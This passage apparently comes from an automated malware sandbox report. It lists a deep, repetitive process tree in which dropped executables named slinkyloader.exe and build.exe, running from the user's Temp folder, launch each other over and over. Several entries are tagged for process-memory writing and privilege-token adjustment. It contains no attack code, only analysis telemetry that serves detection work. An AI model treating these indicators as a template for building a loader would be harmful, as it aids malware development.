        36⤵
        
        PID:10340
        
        C:\Users\Admin\AppData\Local\Temp\build.exe
        
        "C:\Users\Admin\AppData\Local\Temp\build.exe"
        37⤵
        
        PID:10708
        
        C:\Users\Admin\AppData\Local\Temp\slinkyloader.exe
        
        "C:\Users\Admin\AppData\Local\Temp\slinkyloader.exe"
        37⤵
        
        PID:11040
        
        C:\Users\Admin\AppData\Local\Temp\slinkyloader.exe
        
        "C:\Users\Admin\AppData\Local\Temp\slinkyloader.exe"
        10⤵
        Executes dropped EXE
        
        PID:5144
        
        C:\Users\Admin\AppData\Local\Temp\build.exe
        
        "C:\Users\Admin\AppData\Local\Temp\build.exe"
        11⤵
        Executes dropped EXE
        Suspicious use of AdjustPrivilegeToken
        
        PID:5620
        
        C:\Users\Admin\AppData\Local\Temp\slinkyloader.exe
        
        "C:\Users\Admin\AppData\Local\Temp\slinkyloader.exe"
        11⤵
        Executes dropped EXE
        
        PID:5724
        
        C:\Users\Admin\AppData\Local\Temp\build.exe
        
        "C:\Users\Admin\AppData\Local\Temp\build.exe"
        12⤵
        Executes dropped EXE
        Suspicious use of AdjustPrivilegeToken
        
        PID:6120
        
        C:\Users\Admin\AppData\Local\Temp\slinkyloader.exe
        
        "C:\Users\Admin\AppData\Local\Temp\slinkyloader.exe"
        12⤵
        Executes dropped EXE
        
        PID:5200
        
        C:\Users\Admin\AppData\Local\Temp\build.exe
        
        "C:\Users\Admin\AppData\Local\Temp\build.exe"
        13⤵
        Executes dropped EXE
        Suspicious use of AdjustPrivilegeToken
        
        PID:5636
        
        C:\Users\Admin\AppData\Local\Temp\slinkyloader.exe
        
        "C:\Users\Admin\AppData\Local\Temp\slinkyloader.exe"
        13⤵
        Executes dropped EXE
        
        PID:5536
        
        C:\Users\Admin\AppData\Local\Temp\build.exe
        
        "C:\Users\Admin\AppData\Local\Temp\build.exe"
        14⤵
        Suspicious use of AdjustPrivilegeToken
        
        PID:4428
        
        C:\Users\Admin\AppData\Local\Temp\slinkyloader.exe
        
        "C:\Users\Admin\AppData\Local\Temp\slinkyloader.exe"
        14⤵
        
        PID:3020
        
        C:\Users\Admin\AppData\Local\Temp\build.exe
        
        "C:\Users\Admin\AppData\Local\Temp\build.exe"
        15⤵
        Suspicious use of AdjustPrivilegeToken
        
        PID:712
        
        C:\Users\Admin\AppData\Local\Temp\slinkyloader.exe
        
        "C:\Users\Admin\AppData\Local\Temp\slinkyloader.exe"
        15⤵
        
        PID:5880
        
        C:\Users\Admin\AppData\Local\Temp\build.exe
        
        "C:\Users\Admin\AppData\Local\Temp\build.exe"
        16⤵
        Suspicious use of AdjustPrivilegeToken
        
        PID:6516
        
        C:\Users\Admin\AppData\Local\Temp\slinkyloader.exe
        
        "C:\Users\Admin\AppData\Local\Temp\slinkyloader.exe"
        16⤵
        
        PID:6548
        
        C:\Users\Admin\AppData\Local\Temp\build.exe
        
        "C:\Users\Admin\AppData\Local\Temp\build.exe"
        17⤵
        Suspicious use of AdjustPrivilegeToken
        
        PID:6940
        
        C:\Users\Admin\AppData\Local\Temp\slinkyloader.exe
        
        "C:\Users\Admin\AppData\Local\Temp\slinkyloader.exe"
        17⤵
        
        PID:6976
        
        C:\Users\Admin\AppData\Local\Temp\build.exe
        
        "C:\Users\Admin\AppData\Local\Temp\build.exe"
        18⤵
        Suspicious use of AdjustPrivilegeToken
        
        PID:6196
        
        C:\Users\Admin\AppData\Local\Temp\slinkyloader.exe
        
        "C:\Users\Admin\AppData\Local\Temp\slinkyloader.exe"
        18⤵
        
        PID:6280
        
        C:\Users\Admin\AppData\Local\Temp\slinkyloader.exe
        
        "C:\Users\Admin\AppData\Local\Temp\slinkyloader.exe"
        7⤵
        Executes dropped EXE
        Suspicious use of WriteProcessMemory
        
        PID:3660
        
        C:\Users\Admin\AppData\Local\Temp\build.exe
        
        "C:\Users\Admin\AppData\Local\Temp\build.exe"
        8⤵
        Executes dropped EXE
        Suspicious use of AdjustPrivilegeToken
        
        PID:1052
        
        C:\Users\Admin\AppData\Local\Temp\slinkyloader.exe
        
        "C:\Users\Admin\AppData\Local\Temp\slinkyloader.exe"
        8⤵
        Executes dropped EXE
        
        PID:2716
        
        C:\Users\Admin\AppData\Local\Temp\build.exe
        
        "C:\Users\Admin\AppData\Local\Temp\build.exe"
        9⤵
        Executes dropped EXE
        Suspicious use of AdjustPrivilegeToken
        
        PID:2604
        
        C:\Users\Admin\AppData\Local\Temp\slinkyloader.exe
        
        "C:\Users\Admin\AppData\Local\Temp\slinkyloader.exe"
        9⤵
        Executes dropped EXE
        
        PID:412
        
        C:\Users\Admin\AppData\Local\Temp\build.exe
        
        "C:\Users\Admin\AppData\Local\Temp\build.exe"
        10⤵
        Executes dropped EXE
        Suspicious use of AdjustPrivilegeToken
        
        PID:3584
        
        C:\Users\Admin\AppData\Local\Temp\slinkyloader.exe
        
        "C:\Users\Admin\AppData\Local\Temp\slinkyloader.exe"
        10⤵
        Executes dropped EXE
        
        PID:1044
        
        C:\Users\Admin\AppData\Local\Temp\build.exe
        
        "C:\Users\Admin\AppData\Local\Temp\build.exe"
        11⤵
        Executes dropped EXE
        Suspicious use of AdjustPrivilegeToken
        
        PID:3128
        
        C:\Users\Admin\AppData\Local\Temp\slinkyloader.exe
        
        "C:\Users\Admin\AppData\Local\Temp\slinkyloader.exe"
        11⤵
        Executes dropped EXE
        
        PID:1244
        
        C:\Users\Admin\AppData\Local\Temp\build.exe
        
        "C:\Users\Admin\AppData\Local\Temp\build.exe"
        12⤵
        Executes dropped EXE
        Suspicious use of AdjustPrivilegeToken
        
        PID:4720
        
        C:\Users\Admin\AppData\Local\Temp\slinkyloader.exe
        
        "C:\Users\Admin\AppData\Local\Temp\slinkyloader.exe"
        12⤵
        Executes dropped EXE
        
        PID:1984
        
        C:\Users\Admin\AppData\Local\Temp\build.exe
        
        "C:\Users\Admin\AppData\Local\Temp\build.exe"
        13⤵
        Executes dropped EXE
        Suspicious use of AdjustPrivilegeToken
        
        PID:4280
        
        C:\Users\Admin\AppData\Local\Temp\slinkyloader.exe
        
        "C:\Users\Admin\AppData\Local\Temp\slinkyloader.exe"
        13⤵
        Executes dropped EXE
        
        PID:3076
        
        C:\Users\Admin\AppData\Local\Temp\build.exe
        
        "C:\Users\Admin\AppData\Local\Temp\build.exe"
        14⤵
        Executes dropped EXE
        Suspicious use of AdjustPrivilegeToken
        
        PID:5224
        
        C:\Users\Admin\AppData\Local\Temp\slinkyloader.exe
        
        "C:\Users\Admin\AppData\Local\Temp\slinkyloader.exe"
        14⤵
        Executes dropped EXE
        
        PID:5288
        
        C:\Users\Admin\AppData\Local\Temp\build.exe
        
        "C:\Users\Admin\AppData\Local\Temp\build.exe"
        15⤵
        Executes dropped EXE
        Suspicious use of AdjustPrivilegeToken
        
        PID:5816
        
        C:\Users\Admin\AppData\Local\Temp\slinkyloader.exe
        
        "C:\Users\Admin\AppData\Local\Temp\slinkyloader.exe"
        15⤵
        Executes dropped EXE
        
        PID:5864
        
        C:\Users\Admin\AppData\Local\Temp\build.exe
        
        "C:\Users\Admin\AppData\Local\Temp\build.exe"
        16⤵
        Executes dropped EXE
        Suspicious use of AdjustPrivilegeToken
        
        PID:3900
        
        C:\Users\Admin\AppData\Local\Temp\slinkyloader.exe
        
        "C:\Users\Admin\AppData\Local\Temp\slinkyloader.exe"
        16⤵
        Executes dropped EXE
        
        PID:1508
        
        C:\Users\Admin\AppData\Local\Temp\build.exe
        
        "C:\Users\Admin\AppData\Local\Temp\build.exe"
        17⤵
        Executes dropped EXE
        Suspicious use of AdjustPrivilegeToken
        
        PID:5572
        
        C:\Users\Admin\AppData\Local\Temp\slinkyloader.exe
        
        "C:\Users\Admin\AppData\Local\Temp\slinkyloader.exe"
        17⤵
        Executes dropped EXE
        
        PID:5484
        
        C:\Users\Admin\AppData\Local\Temp\build.exe
        
        "C:\Users\Admin\AppData\Local\Temp\build.exe"
        18⤵
        Suspicious use of AdjustPrivilegeToken
        
        PID:4024
        
        C:\Users\Admin\AppData\Local\Temp\slinkyloader.exe
        
        "C:\Users\Admin\AppData\Local\Temp\slinkyloader.exe"
        18⤵
        
        PID:1508
        
        C:\Users\Admin\AppData\Local\Temp\build.exe
        
        "C:\Users\Admin\AppData\Local\Temp\build.exe"
        19⤵
        Suspicious use of AdjustPrivilegeToken
        
        PID:6240
        
        C:\Users\Admin\AppData\Local\Temp\slinkyloader.exe
        
        "C:\Users\Admin\AppData\Local\Temp\slinkyloader.exe"
        19⤵
        
        PID:6276
        
        C:\Users\Admin\AppData\Local\Temp\build.exe
        
        "C:\Users\Admin\AppData\Local\Temp\build.exe"
        20⤵
        Suspicious use of AdjustPrivilegeToken
        
        PID:6656
        
        C:\Users\Admin\AppData\Local\Temp\slinkyloader.exe
        
        "C:\Users\Admin\AppData\Local\Temp\slinkyloader.exe"
        20⤵
        
        PID:6676
        
        C:\Users\Admin\AppData\Local\Temp\build.exe
        
        "C:\Users\Admin\AppData\Local\Temp\build.exe"
        21⤵
        Suspicious use of AdjustPrivilegeToken
        
        PID:7080
        
        C:\Users\Admin\AppData\Local\Temp\slinkyloader.exe
        
        "C:\Users\Admin\AppData\Local\Temp\slinkyloader.exe"
        21⤵
        
        PID:7136
        
        C:\Users\Admin\AppData\Local\Temp\build.exe
        
        "C:\Users\Admin\AppData\Local\Temp\build.exe"
        22⤵
        Suspicious use of AdjustPrivilegeToken
        
        PID:6712
        
        C:\Users\Admin\AppData\Local\Temp\slinkyloader.exe
        
        "C:\Users\Admin\AppData\Local\Temp\slinkyloader.exe"
        22⤵
        
        PID:2440
        
        C:\Users\Admin\AppData\Local\Temp\build.exe
        
        "C:\Users\Admin\AppData\Local\Temp\build.exe"
        23⤵
        Suspicious use of AdjustPrivilegeToken
        
        PID:6288
        
        C:\Users\Admin\AppData\Local\Temp\slinkyloader.exe
        
        "C:\Users\Admin\AppData\Local\Temp\slinkyloader.exe"
        23⤵
        
        PID:6428
        
        C:\Users\Admin\AppData\Local\Temp\build.exe
        
        "C:\Users\Admin\AppData\Local\Temp\build.exe"
        24⤵
        Suspicious use of AdjustPrivilegeToken
        
        PID:7428
        
        C:\Users\Admin\AppData\Local\Temp\slinkyloader.exe
        
        "C:\Users\Admin\AppData\Local\Temp\slinkyloader.exe"
        24⤵
        
        PID:7460
        
        C:\Users\Admin\AppData\Local\Temp\build.exe
        
        "C:\Users\Admin\AppData\Local\Temp\build.exe"
        25⤵
        Suspicious use of AdjustPrivilegeToken
        
        PID:7860
        
        C:\Users\Admin\AppData\Local\Temp\slinkyloader.exe
        
        "C:\Users\Admin\AppData\Local\Temp\slinkyloader.exe"
        25⤵
        
        PID:7900
        
        C:\Users\Admin\AppData\Local\Temp\build.exe
        
        "C:\Users\Admin\AppData\Local\Temp\build.exe"
        26⤵
        Suspicious use of AdjustPrivilegeToken
        
        PID:7060
        
        C:\Users\Admin\AppData\Local\Temp\slinkyloader.exe
        
        "C:\Users\Admin\AppData\Local\Temp\slinkyloader.exe"
        26⤵
        
        PID:3560
        
        C:\Users\Admin\AppData\Local\Temp\build.exe
        
        "C:\Users\Admin\AppData\Local\Temp\build.exe"
        27⤵
        
        PID:7908
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        28⤵
        
        PID:7460
        
        C:\Users\Admin\AppData\Local\Temp\slinkyloader.exe
        
        "C:\Users\Admin\AppData\Local\Temp\slinkyloader.exe"
        27⤵
        
        PID:7616
        
        C:\Users\Admin\AppData\Local\Temp\build.exe
        
        "C:\Users\Admin\AppData\Local\Temp\build.exe"
        28⤵
        
        PID:3424
        
        C:\Users\Admin\AppData\Local\Temp\slinkyloader.exe
        
        "C:\Users\Admin\AppData\Local\Temp\slinkyloader.exe"
        28⤵
        
        PID:7528
        
        C:\Users\Admin\AppData\Local\Temp\build.exe
        
        "C:\Users\Admin\AppData\Local\Temp\build.exe"
        29⤵
        
        PID:8360
        
        C:\Users\Admin\AppData\Local\Temp\slinkyloader.exe
        
        "C:\Users\Admin\AppData\Local\Temp\slinkyloader.exe"
        29⤵
        
        PID:8416
        
        C:\Users\Admin\AppData\Local\Temp\build.exe
        
        "C:\Users\Admin\AppData\Local\Temp\build.exe"
        30⤵
        
        PID:8932
        
        C:\Users\Admin\AppData\Local\Temp\slinkyloader.exe
        
        "C:\Users\Admin\AppData\Local\Temp\slinkyloader.exe"
        30⤵
        
        PID:8988
        
        C:\Users\Admin\AppData\Local\Temp\build.exe
        
        "C:\Users\Admin\AppData\Local\Temp\build.exe"
        31⤵
        
        PID:8740
        
        C:\Users\Admin\AppData\Local\Temp\slinkyloader.exe
        
        "C:\Users\Admin\AppData\Local\Temp\slinkyloader.exe"
        31⤵
        
        PID:8864
        
        C:\Users\Admin\AppData\Local\Temp\build.exe
        
        "C:\Users\Admin\AppData\Local\Temp\build.exe"
        32⤵
        
        PID:8288
        
        C:\Users\Admin\AppData\Local\Temp\slinkyloader.exe
        
        "C:\Users\Admin\AppData\Local\Temp\slinkyloader.exe"
        32⤵
        
        PID:2040
        
        C:\Users\Admin\AppData\Local\Temp\build.exe
        
        "C:\Users\Admin\AppData\Local\Temp\build.exe"
        33⤵
        
        PID:8592
        
        C:\Users\Admin\AppData\Local\Temp\slinkyloader.exe
        
        "C:\Users\Admin\AppData\Local\Temp\slinkyloader.exe"
        33⤵
        
        PID:9132
        
        C:\Users\Admin\AppData\Local\Temp\build.exe
        
        "C:\Users\Admin\AppData\Local\Temp\build.exe"
        34⤵
        
        PID:9588
        
        C:\Users\Admin\AppData\Local\Temp\slinkyloader.exe
        
        "C:\Users\Admin\AppData\Local\Temp\slinkyloader.exe"
        34⤵
        
        PID:9632
  - - C:\Users\Admin\AppData\Local\Temp\slinkyloader.exe
      "C:\Users\Admin\AppData\Local\Temp\slinkyloader.exe"
      4⤵
      Executes dropped EXE
      Suspicious use of WriteProcessMemory
      PID:1532
    - - C:\Users\Admin\AppData\Local\Temp\build.exe
        
        "C:\Users\Admin\AppData\Local\Temp\build.exe"
        5⤵
        Executes dropped EXE
        Suspicious use of AdjustPrivilegeToken
        
        PID:4804
    - - C:\Users\Admin\AppData\Local\Temp\slinkyloader.exe
        
        "C:\Users\Admin\AppData\Local\Temp\slinkyloader.exe"
        5⤵
        Executes dropped EXE
        Suspicious use of WriteProcessMemory
        
        PID:3824
      - C:\Users\Admin\AppData\Local\Temp\build.exe
        
        "C:\Users\Admin\AppData\Local\Temp\build.exe"
        6⤵
        Executes dropped EXE
        Suspicious use of AdjustPrivilegeToken
        
        PID:1324
      - C:\Users\Admin\AppData\Local\Temp\slinkyloader.exe
        
        "C:\Users\Admin\AppData\Local\Temp\slinkyloader.exe"
        6⤵
        Executes dropped EXE
        Suspicious use of WriteProcessMemory
        
        PID:4408
        
        C:\Users\Admin\AppData\Local\Temp\build.exe
        
        "C:\Users\Admin\AppData\Local\Temp\build.exe"
        7⤵
        Executes dropped EXE
        Suspicious use of AdjustPrivilegeToken
        
        PID:5112
        
        C:\Users\Admin\AppData\Local\Temp\slinkyloader.exe
        
        "C:\Users\Admin\AppData\Local\Temp\slinkyloader.exe"
        7⤵
        Executes dropped EXE
        Suspicious use of WriteProcessMemory
        
        PID:3708
        
        C:\Users\Admin\AppData\Local\Temp\build.exe
        
        "C:\Users\Admin\AppData\Local\Temp\build.exe"
        8⤵
        Executes dropped EXE
        Suspicious use of AdjustPrivilegeToken
        
        PID:876
        
        C:\Users\Admin\AppData\Local\Temp\slinkyloader.exe
        
        "C:\Users\Admin\AppData\Local\Temp\slinkyloader.exe"
        8⤵
        Executes dropped EXE
        Suspicious use of WriteProcessMemory
        
        PID:2512
        
        C:\Users\Admin\AppData\Local\Temp\build.exe
        
        "C:\Users\Admin\AppData\Local\Temp\build.exe"
        9⤵
        Executes dropped EXE
        Suspicious use of AdjustPrivilegeToken
        
        PID:1468
        
        C:\Users\Admin\AppData\Local\Temp\slinkyloader.exe
        
        "C:\Users\Admin\AppData\Local\Temp\slinkyloader.exe"
        9⤵
        Executes dropped EXE
        Suspicious use of WriteProcessMemory
        
        PID:916
        
        C:\Users\Admin\AppData\Local\Temp\build.exe
        
        "C:\Users\Admin\AppData\Local\Temp\build.exe"
        10⤵
        Executes dropped EXE
        Suspicious use of AdjustPrivilegeToken
        
        PID:2800
        
        C:\Users\Admin\AppData\Local\Temp\slinkyloader.exe
        
        "C:\Users\Admin\AppData\Local\Temp\slinkyloader.exe"
        10⤵
        Executes dropped EXE
        Suspicious use of WriteProcessMemory
        
        PID:484
        
        C:\Users\Admin\AppData\Local\Temp\build.exe
        
        "C:\Users\Admin\AppData\Local\Temp\build.exe"
        11⤵
        Executes dropped EXE
        Suspicious use of AdjustPrivilegeToken
        
        PID:3908
        
        C:\Users\Admin\AppData\Local\Temp\slinkyloader.exe
        
        "C:\Users\Admin\AppData\Local\Temp\slinkyloader.exe"
        11⤵
        Executes dropped EXE
        Suspicious use of WriteProcessMemory
        
        PID:3680
        
        C:\Users\Admin\AppData\Local\Temp\build.exe
        
        "C:\Users\Admin\AppData\Local\Temp\build.exe"
        12⤵
        Executes dropped EXE
        Suspicious use of AdjustPrivilegeToken
        
        PID:2912
        
        C:\Users\Admin\AppData\Local\Temp\slinkyloader.exe
        
        "C:\Users\Admin\AppData\Local\Temp\slinkyloader.exe"
        12⤵
        Executes dropped EXE
        
        PID:3312
        
        C:\Users\Admin\AppData\Local\Temp\build.exe
        
        "C:\Users\Admin\AppData\Local\Temp\build.exe"
        13⤵
        Executes dropped EXE
        Suspicious use of AdjustPrivilegeToken
        
        PID:4784
        
        C:\Users\Admin\AppData\Local\Temp\slinkyloader.exe
        
        "C:\Users\Admin\AppData\Local\Temp\slinkyloader.exe"
        13⤵
        Executes dropped EXE
        
        PID:4364
        
        C:\Users\Admin\AppData\Local\Temp\build.exe
        
        "C:\Users\Admin\AppData\Local\Temp\build.exe"
        14⤵
        Executes dropped EXE
        Suspicious use of AdjustPrivilegeToken
        
        PID:2588
        
        C:\Users\Admin\AppData\Local\Temp\slinkyloader.exe
        
        "C:\Users\Admin\AppData\Local\Temp\slinkyloader.exe"
        14⤵
        Executes dropped EXE
        
        PID:3496
        
        C:\Users\Admin\AppData\Local\Temp\build.exe
        
        "C:\Users\Admin\AppData\Local\Temp\build.exe"
        15⤵
        Executes dropped EXE
        Suspicious use of AdjustPrivilegeToken
        
        PID:4116
        
        C:\Users\Admin\AppData\Local\Temp\slinkyloader.exe
        
        "C:\Users\Admin\AppData\Local\Temp\slinkyloader.exe"
        15⤵
        Executes dropped EXE
        
        PID:2952
        
        C:\Users\Admin\AppData\Local\Temp\build.exe
        
        "C:\Users\Admin\AppData\Local\Temp\build.exe"
        16⤵
        Executes dropped EXE
        Suspicious use of AdjustPrivilegeToken
        
        PID:2456
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        17⤵
        
        PID:3312
        
        C:\Users\Admin\AppData\Local\Temp\slinkyloader.exe
        
        "C:\Users\Admin\AppData\Local\Temp\slinkyloader.exe"
        16⤵
        Executes dropped EXE
        
        PID:1952
        
        C:\Users\Admin\AppData\Local\Temp\build.exe
        
        "C:\Users\Admin\AppData\Local\Temp\build.exe"
        17⤵
        Executes dropped EXE
        Suspicious use of AdjustPrivilegeToken
        
        PID:3340
        
        C:\Users\Admin\AppData\Local\Temp\slinkyloader.exe
        
        "C:\Users\Admin\AppData\Local\Temp\slinkyloader.exe"
        17⤵
        Executes dropped EXE
        
        PID:4876
        
        C:\Users\Admin\AppData\Local\Temp\build.exe
        
        "C:\Users\Admin\AppData\Local\Temp\build.exe"
        18⤵
        Executes dropped EXE
        Suspicious use of AdjustPrivilegeToken
        
        PID:1496
        
        C:\Users\Admin\AppData\Local\Temp\slinkyloader.exe
        
        "C:\Users\Admin\AppData\Local\Temp\slinkyloader.exe"
        18⤵
        Executes dropped EXE
        
        PID:4852
        
        C:\Users\Admin\AppData\Local\Temp\build.exe
        
        "C:\Users\Admin\AppData\Local\Temp\build.exe"
        19⤵
        Executes dropped EXE
        Suspicious use of AdjustPrivilegeToken
        
        PID:5416
        
        C:\Users\Admin\AppData\Local\Temp\slinkyloader.exe
        
        "C:\Users\Admin\AppData\Local\Temp\slinkyloader.exe"
        19⤵
        Executes dropped EXE
        
        PID:5460
        
        C:\Users\Admin\AppData\Local\Temp\build.exe
        
        "C:\Users\Admin\AppData\Local\Temp\build.exe"
        20⤵
        Executes dropped EXE
        Suspicious use of AdjustPrivilegeToken
        
        PID:5976
        
        C:\Users\Admin\AppData\Local\Temp\slinkyloader.exe
        
        "C:\Users\Admin\AppData\Local\Temp\slinkyloader.exe"
        20⤵
        Executes dropped EXE
        
        PID:6020
        
        C:\Users\Admin\AppData\Local\Temp\build.exe
        
        "C:\Users\Admin\AppData\Local\Temp\build.exe"
        21⤵
        Executes dropped EXE
        Suspicious use of AdjustPrivilegeToken
        
        PID:4560
        
        C:\Users\Admin\AppData\Local\Temp\slinkyloader.exe
        
        "C:\Users\Admin\AppData\Local\Temp\slinkyloader.exe"
        21⤵
        Executes dropped EXE
        
        PID:5400
        
        C:\Users\Admin\AppData\Local\Temp\build.exe
        
        "C:\Users\Admin\AppData\Local\Temp\build.exe"
        22⤵
        Executes dropped EXE
        Suspicious use of AdjustPrivilegeToken
        
        PID:5284
        
        C:\Users\Admin\AppData\Local\Temp\slinkyloader.exe
        
        "C:\Users\Admin\AppData\Local\Temp\slinkyloader.exe"
        22⤵
        
        PID:5348
        
        C:\Users\Admin\AppData\Local\Temp\build.exe
        
        "C:\Users\Admin\AppData\Local\Temp\build.exe"
        23⤵
        Suspicious use of AdjustPrivilegeToken
        
        PID:6036
        
        C:\Users\Admin\AppData\Local\Temp\slinkyloader.exe
        
        "C:\Users\Admin\AppData\Local\Temp\slinkyloader.exe"
        23⤵
        
        PID:5988
        
        C:\Users\Admin\AppData\Local\Temp\build.exe
        
        "C:\Users\Admin\AppData\Local\Temp\build.exe"
        24⤵
        Suspicious use of AdjustPrivilegeToken
        
        PID:6376
        
        C:\Users\Admin\AppData\Local\Temp\slinkyloader.exe
        
        "C:\Users\Admin\AppData\Local\Temp\slinkyloader.exe"
        24⤵
        
        PID:6408
        
        C:\Users\Admin\AppData\Local\Temp\build.exe
        
        "C:\Users\Admin\AppData\Local\Temp\build.exe"
        25⤵
        Suspicious use of AdjustPrivilegeToken
        
        PID:6796
        
        C:\Users\Admin\AppData\Local\Temp\slinkyloader.exe
        
        "C:\Users\Admin\AppData\Local\Temp\slinkyloader.exe"
        25⤵
        
        PID:6828
        
        C:\Users\Admin\AppData\Local\Temp\build.exe
        
        "C:\Users\Admin\AppData\Local\Temp\build.exe"
        26⤵
        Suspicious use of AdjustPrivilegeToken
        
        PID:5484
        
        C:\Users\Admin\AppData\Local\Temp\slinkyloader.exe
        
        "C:\Users\Admin\AppData\Local\Temp\slinkyloader.exe"
        26⤵
        
        PID:6204
        
        C:\Users\Admin\AppData\Local\Temp\build.exe
        
        "C:\Users\Admin\AppData\Local\Temp\build.exe"
        27⤵
        Suspicious use of AdjustPrivilegeToken
        
        PID:5880
        
        C:\Users\Admin\AppData\Local\Temp\slinkyloader.exe
        
        "C:\Users\Admin\AppData\Local\Temp\slinkyloader.exe"
        27⤵
        
        PID:6976
        
        C:\Users\Admin\AppData\Local\Temp\build.exe
        
        "C:\Users\Admin\AppData\Local\Temp\build.exe"
        28⤵
        Suspicious use of AdjustPrivilegeToken
        
        PID:6932
        
        C:\Users\Admin\AppData\Local\Temp\slinkyloader.exe
        
        "C:\Users\Admin\AppData\Local\Temp\slinkyloader.exe"
        28⤵
        
        PID:7184
        
        C:\Users\Admin\AppData\Local\Temp\build.exe
        
        "C:\Users\Admin\AppData\Local\Temp\build.exe"
        29⤵
        Suspicious use of AdjustPrivilegeToken
        
        PID:7576
        
        C:\Users\Admin\AppData\Local\Temp\slinkyloader.exe
        
        "C:\Users\Admin\AppData\Local\Temp\slinkyloader.exe"
        29⤵
        
        PID:7612
        
        C:\Users\Admin\AppData\Local\Temp\build.exe
        
        "C:\Users\Admin\AppData\Local\Temp\build.exe"
        30⤵
        Suspicious use of AdjustPrivilegeToken
        
        PID:8004
        
        C:\Users\Admin\AppData\Local\Temp\slinkyloader.exe
        
        "C:\Users\Admin\AppData\Local\Temp\slinkyloader.exe"
        30⤵
        
        PID:8044
        
        C:\Users\Admin\AppData\Local\Temp\build.exe
        
        "C:\Users\Admin\AppData\Local\Temp\build.exe"
        31⤵
        Suspicious use of AdjustPrivilegeToken
        
        PID:500
        
        C:\Users\Admin\AppData\Local\Temp\slinkyloader.exe
        
        "C:\Users\Admin\AppData\Local\Temp\slinkyloader.exe"
        31⤵
        
        PID:7532
        
        C:\Users\Admin\AppData\Local\Temp\build.exe
        
        "C:\Users\Admin\AppData\Local\Temp\build.exe"
        32⤵
        
        PID:2364
        
        C:\Users\Admin\AppData\Local\Temp\slinkyloader.exe
        
        "C:\Users\Admin\AppData\Local\Temp\slinkyloader.exe"
        32⤵
        
        PID:3224
        
        C:\Users\Admin\AppData\Local\Temp\build.exe
        
        "C:\Users\Admin\AppData\Local\Temp\build.exe"
        33⤵
        
        PID:7852
        
        C:\Users\Admin\AppData\Local\Temp\slinkyloader.exe
        
        "C:\Users\Admin\AppData\Local\Temp\slinkyloader.exe"
        33⤵
        
        PID:7972
        
        C:\Users\Admin\AppData\Local\Temp\build.exe
        
        "C:\Users\Admin\AppData\Local\Temp\build.exe"
        34⤵
        
        PID:8500
        
        C:\Users\Admin\AppData\Local\Temp\slinkyloader.exe
        
        "C:\Users\Admin\AppData\Local\Temp\slinkyloader.exe"
        34⤵
        
        PID:8584
        
        C:\Users\Admin\AppData\Local\Temp\build.exe
        
        "C:\Users\Admin\AppData\Local\Temp\build.exe"
        35⤵
        
        PID:9076
        
        C:\Users\Admin\AppData\Local\Temp\slinkyloader.exe
        
        "C:\Users\Admin\AppData\Local\Temp\slinkyloader.exe"
        35⤵
        
        PID:9124
        
        C:\Users\Admin\AppData\Local\Temp\build.exe
        
        "C:\Users\Admin\AppData\Local\Temp\build.exe"
        36⤵
        
        PID:6692
        
        C:\Users\Admin\AppData\Local\Temp\slinkyloader.exe
        
        "C:\Users\Admin\AppData\Local\Temp\slinkyloader.exe"
        36⤵
        
        PID:6292
        
        C:\Users\Admin\AppData\Local\Temp\build.exe
        
        "C:\Users\Admin\AppData\Local\Temp\build.exe"
        37⤵
        
        PID:1444
        
        C:\Users\Admin\AppData\Local\Temp\slinkyloader.exe
        
        "C:\Users\Admin\AppData\Local\Temp\slinkyloader.exe"
        37⤵
        
        PID:9128
        
        C:\Users\Admin\AppData\Local\Temp\build.exe
        
        "C:\Users\Admin\AppData\Local\Temp\build.exe"
        38⤵
        
        PID:9304
        
        C:\Users\Admin\AppData\Local\Temp\slinkyloader.exe
        
        "C:\Users\Admin\AppData\Local\Temp\slinkyloader.exe"
        38⤵
        
        PID:9332
        
        C:\Users\Admin\AppData\Local\Temp\build.exe
        
        "C:\Users\Admin\AppData\Local\Temp\build.exe"
        39⤵
        
        PID:9728
        
        C:\Users\Admin\AppData\Local\Temp\slinkyloader.exe
        
        "C:\Users\Admin\AppData\Local\Temp\slinkyloader.exe"
        39⤵
        
        PID:9764
        
        C:\Users\Admin\AppData\Local\Temp\build.exe
        
        "C:\Users\Admin\AppData\Local\Temp\build.exe"
        40⤵
        
        PID:10048
        
        C:\Users\Admin\AppData\Local\Temp\slinkyloader.exe
        
        "C:\Users\Admin\AppData\Local\Temp\slinkyloader.exe"
        40⤵
        
        PID:10076
        
        C:\Users\Admin\AppData\Local\Temp\build.exe
        
        "C:\Users\Admin\AppData\Local\Temp\build.exe"
        41⤵
        
        PID:9288
        
        C:\Users\Admin\AppData\Local\Temp\slinkyloader.exe
        
        "C:\Users\Admin\AppData\Local\Temp\slinkyloader.exe"
        41⤵
        
        PID:9300
        
        C:\Users\Admin\AppData\Local\Temp\build.exe
        
        "C:\Users\Admin\AppData\Local\Temp\build.exe"
        42⤵
        
        PID:9656
        
        C:\Users\Admin\AppData\Local\Temp\slinkyloader.exe
        
        "C:\Users\Admin\AppData\Local\Temp\slinkyloader.exe"
        42⤵
        
        PID:9832
        
        C:\Users\Admin\AppData\Local\Temp\build.exe
        
        "C:\Users\Admin\AppData\Local\Temp\build.exe"
        43⤵
        
        PID:9244
        
        C:\Users\Admin\AppData\Local\Temp\slinkyloader.exe
        
        "C:\Users\Admin\AppData\Local\Temp\slinkyloader.exe"
        43⤵
        
        PID:5676
        
        C:\Users\Admin\AppData\Local\Temp\build.exe
        
        "C:\Users\Admin\AppData\Local\Temp\build.exe"
        44⤵
        
        PID:9524
        
        C:\Users\Admin\AppData\Local\Temp\slinkyloader.exe
        
        "C:\Users\Admin\AppData\Local\Temp\slinkyloader.exe"
        44⤵
        
        PID:5852
        
        C:\Users\Admin\AppData\Local\Temp\build.exe
        
        "C:\Users\Admin\AppData\Local\Temp\build.exe"
        45⤵
        
        PID:8720
        
        C:\Users\Admin\AppData\Local\Temp\slinkyloader.exe
        
        "C:\Users\Admin\AppData\Local\Temp\slinkyloader.exe"
        45⤵
        
        PID:9540
        
        C:\Users\Admin\AppData\Local\Temp\build.exe
        
        "C:\Users\Admin\AppData\Local\Temp\build.exe"
        46⤵
        
        PID:10352
        
        C:\Users\Admin\AppData\Local\Temp\slinkyloader.exe
        
        "C:\Users\Admin\AppData\Local\Temp\slinkyloader.exe"
        46⤵
        
        PID:10368
        
        C:\Users\Admin\AppData\Local\Temp\build.exe
        
        "C:\Users\Admin\AppData\Local\Temp\build.exe"
        47⤵
        
        PID:10640
        
        C:\Users\Admin\AppData\Local\Temp\slinkyloader.exe
        
